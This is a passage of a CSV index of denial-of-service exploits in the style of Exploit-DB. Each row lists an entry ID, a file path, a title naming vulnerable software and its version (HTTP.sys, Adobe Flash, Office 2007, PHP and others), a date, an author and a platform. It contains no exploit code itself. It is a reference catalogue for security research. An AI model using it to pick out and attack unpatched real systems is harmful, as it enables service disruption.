Nasi",dos,linux, +36773,exploits/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)",2015-04-15,rhcp011235,dos,windows, +36776,exploits/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",dos,windows,80 +36788,exploits/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",dos,windows, +36789,exploits/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,dos,php, +36799,exploits/bsd/dos/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)",2015-04-21,nitr0us,dos,bsd, +36814,exploits/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",dos,osx, +36825,exploits/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",dos,hardware,80 +36840,exploits/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",dos,multiple, +36841,exploits/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",dos,windows, +36847,exploits/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",dos,windows, +36868,exploits/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,dos,hardware, +36869,exploits/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,dos,multiple, +36881,exploits/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,dos,multiple, +36896,exploits/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",dos,windows, +36903,exploits/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,dos,ios, +36906,exploits/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)",2015-05-04,beford,dos,linux, +36969,exploits/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,dos,windows, +36972,exploits/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow",2012-03-19,"brock haun",dos,windows, +37014,exploits/windows/dos/37014.py,"iFTP 2.21 - Buffer Overflow Crash (PoC)",2015-05-14,"dogo h@ck",dos,windows, +37036,exploits/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,dos,linux, +37051,exploits/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",dos,linux, +37053,exploits/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",dos,multiple, +37061,exploits/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",dos,multiple, +37068,exploits/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",dos,windows, +37124,exploits/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - 'Registration ID' Buffer Overflow (PoC)",2015-05-26,LiquidWorm,dos,windows, +37149,exploits/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,dos,windows,22 +37160,exploits/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service",2012-05-14,demonalex,dos,windows, +37187,exploits/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,dos,windows,21 +37188,exploits/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,dos,windows, +37199,exploits/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,dos,hardware, +37218,exploits/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,dos,jsp, +37239,exploits/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash (PoC) (2)",2015-06-08,"Pawel Wylecial",dos,windows, +37249,exploits/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",dos,linux, +37299,exploits/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",dos,windows, +37300,exploits/windows/dos/37300.py,"FinePlayer 2.20 - '.mp4' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",dos,windows, +37306,exploits/linux/dos/37306.txt,"Mosh - Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",dos,linux, +37267,exploits/windows/dos/37267.py,"foobar2000 1.3.8 - '.m3u' Local Crash (PoC)",2015-06-12,0neb1n,dos,windows, +37268,exploits/windows/dos/37268.py,"GoldWave 6.1.2 - Local Crash (PoC)",2015-06-12,0neb1n,dos,windows, +41889,exploits/windows/dos/41889.rb,"WinSCP 5.9.4 - 'LIST' Denial of Service (Metasploit)",2017-04-16,"mohammed Mohammed",dos,windows, +37286,exploits/windows/dos/37286.py,"FileZilla 3.11.0.2 SFTP Module - Denial of Service",2015-06-15,3unnym00n,dos,windows, +37287,exploits/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client Denial of Service (PoC)",2015-06-15,LiquidWorm,dos,windows, +37291,exploits/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,dos,windows, +37561,exploits/multiple/dos/37561.pl,"UPNPD M-SEARCH - ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",dos,multiple,1900 +37326,exploits/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",dos,windows, +37327,exploits/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",dos,windows, +37343,exploits/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,dos,windows, +37346,exploits/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service)",2015-06-23,"Francis Provencher",dos,windows, +37347,exploits/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",dos,windows, +37348,exploits/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",dos,windows, +37386,exploits/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",dos,osx, +37566,exploits/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,dos,php, +37456,exploits/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - Firefox Use-After-Free (PoC)",2015-07-01,"Marcin Ressel",dos,windows, +37458,exploits/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,dos,windows, +37462,exploits/windows/dos/37462.pl,"VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,dos,windows, +37463,exploits/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,dos,windows, +37471,exploits/windows/dos/37471.pl,"Zoom Player - '.avi' Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,dos,windows, +37477,exploits/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service",2012-07-03,"Kevin Fenzi",dos,linux, +37478,exploits/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",dos,multiple, +37480,exploits/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,dos,windows, +37487,exploits/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,dos,multiple, +37546,exploits/linux/dos/37546.pl,"File Roller v3.4.1 - Denial of Service (PoC)",2015-07-09,Arsyntex,dos,linux, +37517,exploits/hardware/dos/37517.pl,"INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service",2015-07-07,"Todor Donev",dos,hardware,1900 +37518,exploits/multiple/dos/37518.html,"Arora Browser - Remote Denial of Service",2012-07-18,t3rm!n4t0r,dos,multiple, +37525,exploits/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 - Service Disabling",2015-07-08,hyp3rlinx,dos,windows, +37526,exploits/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash (PoC)",2015-07-08,Arsyntex,dos,windows, +37538,exploits/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",dos,linux, +37558,exploits/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",dos,windows, +37562,exploits/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",dos,multiple,123 +37568,exploits/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,dos,windows, +37593,exploits/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",dos,windows, +37607,exploits/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",dos,windows, +37608,exploits/windows/dos/37608.py,"Internet Download Manager - Find Download Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",dos,windows, +37612,exploits/windows/dos/37612.py,"ZOC Terminal Emulator 7 - Quick Connection Crash (PoC)",2015-07-14,"SATHISH ARTHAR",dos,windows, +37639,exploits/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",dos,multiple, +37640,exploits/windows/dos/37640.pl,"Divx Player 6.8.2 - Denial of Service",2012-08-20,Dark-Puzzle,dos,windows, +37660,exploits/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",dos,ios, +37663,exploits/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",dos,linux, +37669,exploits/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",dos,windows, +37673,exploits/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,dos,windows, +37685,exploits/xml/dos/37685.txt,"SquidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",dos,xml, +37692,exploits/multiple/dos/37692.pl,"aMSN - Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",dos,multiple, +37706,exploits/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",dos,linux, +37711,exploits/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection Denial of Service",2015-07-28,St0rn,dos,windows, +37717,exploits/windows/dos/37717.pl,"KMPlayer 3.9.x - '.srt' Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",dos,windows, +37718,exploits/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash (PoC)",2015-07-31,"SATHISH ARTHAR",dos,windows, +37719,exploits/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)",2015-07-31,"Hadi Zomorodi Monavar",dos,windows, +37721,exploits/multiple/dos/37721.c,"ISC BIND 9 - TKEY (PoC)",2015-08-01,"Errata Security",dos,multiple, +37723,exploits/multiple/dos/37723.py,"ISC BIND 9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,dos,multiple, +37727,exploits/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash (PoC)",2015-08-07,"Hadi Zomorodi Monavar",dos,windows, +37728,exploits/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",dos,php, +37747,exploits/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,dos,windows, +37739,exploits/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",dos,windows,20031 +37741,exploits/osx/dos/37741.txt,"Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",dos,osx, +37743,exploits/linux/dos/37743.pl,"Brasero - Crash (PoC)",2015-08-08,"Mohammad Reza Espargham",dos,linux, +37759,exploits/linux/dos/37759.py,"NeuroServer 0.7.4 - EEG TCP/IP Transceiver Remote Denial of Service",2015-08-12,nitr0us,dos,linux, +37763,exploits/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service",2015-08-12,Un_N0n,dos,windows, +37764,exploits/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",dos,windows, +37766,exploits/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",dos,multiple, +37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service",2015-08-15,St0rn,dos,windows, +37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,dos,windows, +37777,exploits/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",dos,linux, +37783,exploits/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",dos,linux, +38001,exploits/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,dos,windows,22 +37798,exploits/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,dos,windows, +37810,exploits/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,dos,windows, +37839,exploits/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",dos,linux, +37843,exploits/windows/dos/37843.txt,"Flash Player - Integer Overflow in Function.apply",2015-08-19,"Google Security Research",dos,windows, +37844,exploits/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",dos,windows, +37845,exploits/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,dos,windows, +37846,exploits/windows/dos/37846.txt,"Flash - Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,dos,windows, +37847,exploits/windows/dos/37847.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (1)",2015-08-19,bilou,dos,windows, +37848,exploits/windows/dos/37848.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (2)",2015-08-19,bilou,dos,windows, +37849,exploits/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,dos,windows, +37850,exploits/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37852,exploits/multiple/dos/37852.txt,"Adobe Flash - 'Setting' Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37853,exploits/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",dos,windows, +37854,exploits/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",dos,windows, +37855,exploits/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37856,exploits/windows/dos/37856.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)",2015-08-19,"Google Security Research",dos,windows, +37857,exploits/windows/dos/37857.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)",2015-08-19,"Google Security Research",dos,windows, +37858,exploits/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF",2015-08-19,"Google Security Research",dos,windows, +37859,exploits/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37860,exploits/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,dos,windows, +37861,exploits/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,dos,windows, +37862,exploits/windows/dos/37862.txt,"Adobe Flash - Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",dos,windows, +37863,exploits/multiple/dos/37863.txt,"Adobe Flash - scale9Grid Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37864,exploits/multiple/dos/37864.txt,"Adobe Flash - Drawing Methods 'this' Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37865,exploits/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37866,exploits/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",dos,linux, +37867,exploits/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",dos,linux, +37868,exploits/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",dos,lin_x86-64, +37869,exploits/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",dos,linux, +37870,exploits/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",dos,linux, +37871,exploits/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37872,exploits/multiple/dos/37872.txt,"Adobe Flash - Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",dos,multiple, +37873,exploits/multiple/dos/37873.txt,"Adobe Flash - createTextField Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37874,exploits/multiple/dos/37874.txt,"Adobe Flash - Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",dos,multiple, +37875,exploits/windows/dos/37875.txt,"Adobe Flash - URL Resource Use-After-Free",2015-08-19,"Google Security Research",dos,windows, +37876,exploits/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",dos,lin_x86-64, +37877,exploits/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, +37878,exploits/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",dos,multiple, +37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",dos,lin_x86-64, +37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",dos,lin_x86-64, +37881,exploits/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",dos,win_x86, +37882,exploits/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",dos,multiple, +37883,exploits/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,dos,windows, +37884,exploits/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,dos,windows, +37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,dos,windows,21 +37897,exploits/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",dos,linux, +37905,exploits/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,dos,windows, +37908,exploits/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",dos,windows,21 +37909,exploits/windows/dos/37909.txt,"Microsoft Office 2007 - 'wwlib.dll' fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",dos,windows, +37910,exploits/windows/dos/37910.txt,"Microsoft Office 2007 - 'wwlib.dll' Type Confusion (MS15-081)",2015-08-21,"Google Security Research",dos,windows, +37911,exploits/windows/dos/37911.txt,"Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)",2015-08-21,"Google Security Research",dos,windows, +37912,exploits/windows/dos/37912.txt,"Microsoft Office 2007 - 'mso.dll' Arbitrary Free (MS15-081)",2015-08-21,"Google Security Research",dos,windows, +37913,exploits/windows/dos/37913.txt,"Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",dos,windows, +37914,exploits/windows/dos/37914.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",dos,windows, +37915,exploits/windows/dos/37915.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",dos,windows, +37916,exploits/windows/dos/37916.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",dos,windows, +37917,exploits/windows/dos/37917.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",dos,windows, +37918,exploits/windows/dos/37918.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",dos,windows, +37919,exploits/windows/dos/37919.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",dos,windows, +37920,exploits/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",dos,windows, +37921,exploits/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",dos,windows, +37922,exploits/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",dos,windows, +37923,exploits/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)",2015-08-21,"Google Security Research",dos,windows, +37924,exploits/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",dos,windows, +37954,exploits/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",dos,windows,25 +37957,exploits/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,dos,windows, +37966,exploits/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",dos,windows, +37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",dos,windows, +37976,exploits/windows/dos/37976.py,"VideoLAN VLC Media Player 2.2.1 - m3u8/m3u Crash (PoC)",2015-08-26,"Naser Farhadi",dos,windows, +37980,exploits/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",dos,windows, +37981,exploits/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,dos,windows, +37984,exploits/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,dos,windows, +37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,dos,windows, +37990,exploits/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",dos,multiple, +37997,exploits/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,dos,ios,3030 +38014,exploits/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,dos,windows,22 +38021,exploits/multiple/dos/38021.pl,"Media Player Classic (MPC) 1.5 - WebServer Request Handling Remote Denial of Service",2012-11-16,X-Cisadane,dos,multiple, +38028,exploits/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)",2015-08-31,"Robbie Corley",dos,windows, +38031,exploits/windows/dos/38031.pl,"Microsoft Office 2007 - 'msxml5.dll' Crash (PoC)",2015-08-31,"Mohammad Reza Espargham",dos,windows, +38032,exploits/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",dos,ios, +38038,exploits/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",dos,multiple, +38052,exploits/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,dos,windows,21 +38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow",2015-09-01,Un_N0n,dos,windows, +38054,exploits/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,dos,windows, +38055,exploits/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,dos,windows, +38059,exploits/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,dos,bsd, +38072,exploits/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",dos,windows,21 +38085,exploits/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)",2015-09-06,"Robbie Corley",dos,win_x86-64, +38108,exploits/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",dos,windows, +38120,exploits/php/dos/38120.txt,"PHP 5.4/5.5/5.6 - SplDoublyLinkedList 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",dos,php, +38121,exploits/php/dos/38121.txt,"PHP GMP - 'unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",dos,php, +38122,exploits/php/dos/38122.txt,"PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",dos,php, +38123,exploits/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",dos,php, +38125,exploits/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free",2015-09-09,"Taoguang Chen",dos,php, +38132,exploits/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",dos,linux, +38145,exploits/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",dos,linux,389 +38146,exploits/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,dos,windows, +38165,exploits/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,dos,windows, +38177,exploits/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer 